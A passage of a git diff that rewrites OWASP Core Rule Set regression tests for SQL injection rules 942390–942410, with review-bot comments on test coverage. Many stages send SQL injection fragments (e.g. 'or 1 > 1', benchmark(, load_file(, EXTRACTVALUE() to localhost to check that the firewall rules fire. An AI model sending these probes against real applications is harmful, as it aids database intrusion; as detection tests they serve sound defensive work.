expect_ids: [942390] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 7845fb9..2de63c4 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml 
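Review bot: The rewritten `tests:` list for 942390 still holds a single positive stage (`expect_ids: [942390]`), so a later widening of the rule's pattern that starts matching benign input would go unnoticed here, whereas the sibling 942400 file in this same patch pairs its positive case with a `no_expect_ids` control. Consider adding a `test_id: 2` stage that sends a harmless query-string value through the same `/get?var=` path with `log: no_expect_ids: [942390]`; the exact benign sample should be chosen against the rule's regex, which is outside this diff. The carried-over `desc: "SQL Injection Attack"` also says nothing about what `sdfsd%27or%201%20%3e%201` exercises; `desc: "SQL Injection Attack: quote-terminated OR with comparison operator"` would make a failing run readable without decoding the URI.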
@@ -1,43 +1,41 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 942400.yaml +rule_id: 942400 tests: - - test_title: 942400-1 + - test_id: 1 desc: "SQL Injection Attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and '5'orig_var_datavarname=whatever" - version: HTTP/1.0 - output: - log_contains: id "942400" - - test_title: 942400-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and '5'orig_var_datavarname=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [942400] + - test_id: 2 desc: "SQL Injection Attack - false positive" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - # variable name boundary attacks - data: "and 7 oranges" - version: HTTP/1.0 - output: - no_log_contains: id "942400" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + # variable name boundary attacks + data: "and 7 oranges" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942400] 
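Review bot: The `# variable name boundary attacks` comment is repeated verbatim above `data: "and 7 oranges"` in test 2, although that stage is the false-positive control (`log: no_expect_ids: [942400]`) and its payload is plain prose, so the comment now labels the benign sample as an attack; `# benign prose with the same and-<number>-<word> shape; must NOT match` would state what the stage actually checks. The comment was carried over from the old format rather than introduced here, but the format rewrite is the natural moment to correct it. In test 1 the payload `and '5'orig_var_datavarname=whatever` would likewise benefit from a one-line note on why the closing quote glued to the following identifier is the boundary under test, since `desc` is only the generic "SQL Injection Attack".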
diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 75f5667..a3ee7e8 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml 
@@ -1,2013 +1,2011 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942410.yaml +rule_id: 942410 tests: - - test_title: 942410-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ABS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "benchmark(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "BENChmARk(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cast(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CAST(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "char(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chaR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "chr(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CHR(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COALESCE(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Compress (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnCaT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "concat_ws(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP 
CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "convert(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "cOnVeRt(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COS(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "COUNT(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "CURRENT_USER(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - 
User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "database (" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "date(" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=date%5D%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day.+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=day%26%27%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=decode%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=default%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ELT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=encode%3D%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ExtractValue%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-30 - desc: "SQL 
Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=EXTRACTVALUE%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-31 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=floor%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-32 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FLOOR+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-33 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=format%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-34 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=GROUP_CONCAT%28" - version: HTTP/1.0 - output: - 
log_contains: id "942410" - - test_title: 942410-35 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hex%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-36 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=hEx%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-37 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%21%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-38 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-39 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%28" 
- version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-40 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=if%5C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-41 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IFNULL%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-42 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=in+%27%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-43 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=IN+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-44 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "pay=IN%2F%2A%2A%2F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-45 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=insert%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-46 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=left%27%29%3F%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-47 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LEFT%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-48 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-49 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%7C%7C%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-50 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%3F%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-51 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%21%21%21%24%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-52 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=length%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-53 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=LENGTH%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-54 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 
127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-55 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=ln%29+%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-56 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=load_file%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-57 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=local%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-58 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-59 - desc: "SQL Injection Attack" - 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=log%26%26%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-60 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=lower%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-61 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAKE_SET%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-62 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=MAX%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 942410-63 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=md5%28" - version: HTTP/1.0 - output: - log_contains: id "942410" - - test_title: 
